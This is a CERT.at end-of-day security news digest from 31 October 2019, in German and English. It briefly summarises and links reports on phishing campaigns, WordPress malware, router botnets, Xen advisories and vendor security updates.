Tageszusammenfassung - 31.10.2019
End-of-Day report
Timeframe: Mittwoch 30-10-2019 18:00 - Donnerstag 31-10-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan RichterNews
EML attachments in O365 - a recipe for phishing, (Thu, Oct 31st)
Ive recently come across interesting behavior of Office 365 when EML files are attached to e-mail messages, which can be useful for any red teamers out there but which can potentially also make certain types of phishing attacks more successful. https://isc.sans.edu/diary/rss/25474Data URLs and HTML Entities in New WordPress Malware
Last week, an ongoing WordPress malware campaign started a new wave which included a variety of experimental injection types. Scripts as Data URLs The first type looks pretty similar to what we discussed in our recent post. However, instead of placing the code between the - tags, these injections have begun to embed them inline using a so called data URL notation in the src parameter. https://blog.sucuri.net/2019/10/data-urls-and-html-entities-in-new-wordpress-malware.htmlMS-ISAC Releases EOS Software Report List
Original release date: October 30, 2019The Multi-State Information Sharing and Analysis Center (MS-ISAC) has released an end-of-support (EOS) software report list. Software that has reached its EOS date no longer receives security updates and patches from the vendor and is, therefore, susceptible to exploitation from security vulnerabilities. https://www.us-cert.gov/ncas/current-activity/2019/10/30/ms-isac-releases-eos-software-report-list5th eHealth Security Conference: ENISA advises on cybersecurity for hospitals
ENISA, the EU Agency for Cybersecurity organised the 5th consecutive eHealth Security Conference in cooperation with the Spanish Authorities and the Centre for Information Security of Catalonia (CESICAT) on the 30th October in Barcelona. https://www.enisa.europa.eu/news/enisa-news/5th-ehealth-security-conference-enisa-advises-on-cybersecurity-for-hospitalsOffice 365 Users Targeted by Voicemail Scam Pages
Over the past few weeks McAfee Labs has been observing a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. At first, we believed that only one phishing kit was being used to harvest the user-s credentials. However, during our investigation, we found three different malicious [...] https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/Ungenutzte E-Mail-Adressen ermöglichen Zugang zu persönlichen Konten
E-Mail-Adressen, die nicht mehr genutzt werden, werden oft neu vergeben. Wenn diese Adressen noch bei Social-Media-Konten, Gaming-Accounts, Online-Shops oder anderen Zugangsdaten hinterlegt sind, können sich die neuen BesitzerInnen Zugang zu diesen Konten verschaffen. Kriminelle nutzen das zu Betrugs- und Erpressungszwecken aus. https://www.watchlist-internet.at/news/ungenutzte-e-mail-adressen-ermoeglichen-zugang-zu-persoenlichen-konten/Untitled Goose Game security hole could have allowed hackers to wreak havoc
The highly popular -Untitled Goose Game- has been found to be vulnerable to an attack that could allow hackers to run malicious code on your computer. https://hotforsecurity.bitdefender.com/blog/untitled-goose-game-security-hole-could-have-allowed-hackers-to-wreak-havoc-21721.htmlHome & Small Office Wireless Routers Exploited to Attack Gaming Servers
Unit 42 researchers discovered an updated Gafgy variant that looks to infect home and small office WiFi routers of known commercial brands, like Zyxel, Huawei, and Realtek to attack gaming servers. More than 32,000 WiFi routers are potentially vulnerable to these exploits around the world. https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/Vorwarnung: Neue Webseite kommt nächste Woche
tl;dr: Nein, wir werden nächste Woche nicht gehackt, wir stellen nur eine neue Webseite online. http://www.cert.at/services/blog/20191031121150-2561.htmlVulnerabilities
XSA-299 Security Vulnerability
IBM is aware of a reported XSA-299 security vulnerability (CVE-2019-18421) that potentially would permit an attacker from within a VSI to elevate privileges to that of the host.There are no known malicious exploits of this vulnerability, which potentially impacts the hypervisor.IBM is implementing updates to remediate this vulnerability. No downtime for clients is expected and no client action is necessary for IBM Cloud virtual servers. While we do not anticipate any issues with remediation, we [...] https://www.ibm.com/blogs/psirt/xsa-299-security-vulnerability/Security updates for Thursday
Security updates have been issued by Debian (italc and python-ecdsa), Fedora (php and sudo), openSUSE (binutils and docker-runc), Oracle (thunderbird), Red Hat (firefox and sudo), SUSE (ardana-ansible, ardana-glance, ardana-horizon, ardana-input-model, ardana-manila, ardana-neutron, ardana-nova, ardana-octavia, ardana-tempest, crowbar-core, crowbar-ha, crowbar-openstack, crowbar-ui, galera-3, grafana, mariadb, mariadb-connector-c, novnc, openstack-cinder, openstack-glance, openstack-heat, [...] https://lwn.net/Articles/803583/XSA-303 - ARM: Interrupts are unconditionally unmasked in exception handlers
https://xenbits.xen.org/xsa/advisory-303.htmlXSA-302 - passed through PCI devices may corrupt host memory after deassignment
https://xenbits.xen.org/xsa/advisory-302.htmlXSA-301 - add-to-physmap can be abused to DoS Arm hosts
https://xenbits.xen.org/xsa/advisory-301.htmlXSA-299 - Issues with restartable PV type change operations
https://xenbits.xen.org/xsa/advisory-299.htmlXSA-298 - missing descriptor table limit checking in x86 PV emulation
https://xenbits.xen.org/xsa/advisory-298.htmlXSA-296 - VCPUOP_initialise DoS
https://xenbits.xen.org/xsa/advisory-296.htmlNext End-of-Day report: 2019-11-04